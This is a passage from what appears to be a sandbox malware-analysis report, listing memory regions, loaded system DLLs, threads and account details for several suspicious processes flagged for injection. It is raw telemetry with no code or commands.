1845 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1846 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1847 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 1848 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 1849 start_va = 0x1f20000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 1850 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1851 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1852 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1853 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1854 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1855 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1856 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1857 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1858 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1859 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1860 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1862 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1863 start_va = 0x1f20000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 1864 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1866 start_va = 0x2060000 end_va = 0x2396fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1867 start_va = 0x23a0000 end_va = 0x25b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1868 start_va = 0x25c0000 end_va = 0x27defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 1869 start_va = 0x27e0000 end_va = 0x28eafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1870 start_va = 0x28f0000 end_va = 0x2b04fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 1871 start_va = 0x2b10000 end_va = 0x2c1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Thread: id = 145 os_tid = 0x1270 Thread: id = 146 os_tid = 0x1278 Thread: id = 147 os_tid = 0x1280 Process: id = "14" image_name = "claim.exe" filename = "c:\\program files\\uninstall information\\claim.exe" page_root = "0x67ebc000" os_pid = "0xd34" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Uninstall Information\\claim.exe\" " cur_dir = "C:\\Program Files\\Uninstall Information\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2843 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2844 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2845 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2846 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2847 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2848 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2849 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2850 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2851 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2852 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2853 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2854 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2855 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2857 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2858 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2859 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2860 start_va = 0xab0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2861 start_va = 0xac0000 end_va = 0xb7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 2862 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2863 start_va = 0x1060000 end_va = 0x1076fff monitored = 0 entry_point = 0x10614a1 region_type = mapped_file name = "claim.exe" filename = "\\Program Files\\Uninstall Information\\claim.exe" (normalized: "c:\\program files\\uninstall information\\claim.exe") Region: id = 2864 start_va = 0x1080000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 2865 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2866 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2867 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2868 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2869 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2870 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2871 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2872 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2873 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2874 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2875 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2876 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2877 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2878 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2879 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2880 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2881 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2882 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2883 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2884 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2885 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2886 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2887 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2888 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2889 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2890 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 151 os_tid = 0xd64 Thread: id = 152 os_tid = 0xe6c Process: id = "15" image_name = "quite do.exe" filename = "c:\\program files\\windows portable devices\\quite do.exe" page_root = "0x148c6000" os_pid = "0xdb0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\quite do.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2891 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2892 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2893 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2894 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2895 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2896 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2897 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2898 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2899 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2900 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2901 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2902 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2903 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2904 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2905 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2906 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2907 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2908 start_va = 0xba0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2909 start_va = 0xbb0000 end_va = 0xc6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 2910 start_va = 0xd40000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 2911 start_va = 0x1240000 end_va = 0x1256fff monitored = 0 entry_point = 0x12414a1 region_type = mapped_file name = "quite do.exe" filename = "\\Program Files\\Windows Portable Devices\\quite do.exe" (normalized: "c:\\program files\\windows portable devices\\quite do.exe") Region: id = 2912 start_va = 0x1260000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 2913 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2914 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2915 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2916 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2917 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2918 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2919 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2920 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2921 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2922 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2923 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2924 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2925 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2926 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2927 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2928 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2929 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2930 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2931 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2932 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2933 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2934 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2935 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2936 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2937 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2938 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 153 os_tid = 0xd38 Thread: id = 154 os_tid = 0xd30 Process: id = "16" image_name = "drop.exe" filename = "c:\\program files\\windows media player\\drop.exe" page_root = "0x16e21000" os_pid = "0xbdc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Media Player\\drop.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2939 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2940 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2941 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2942 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2943 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2944 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2945 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2946 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2947 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2948 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2949 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2950 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2951 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2952 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 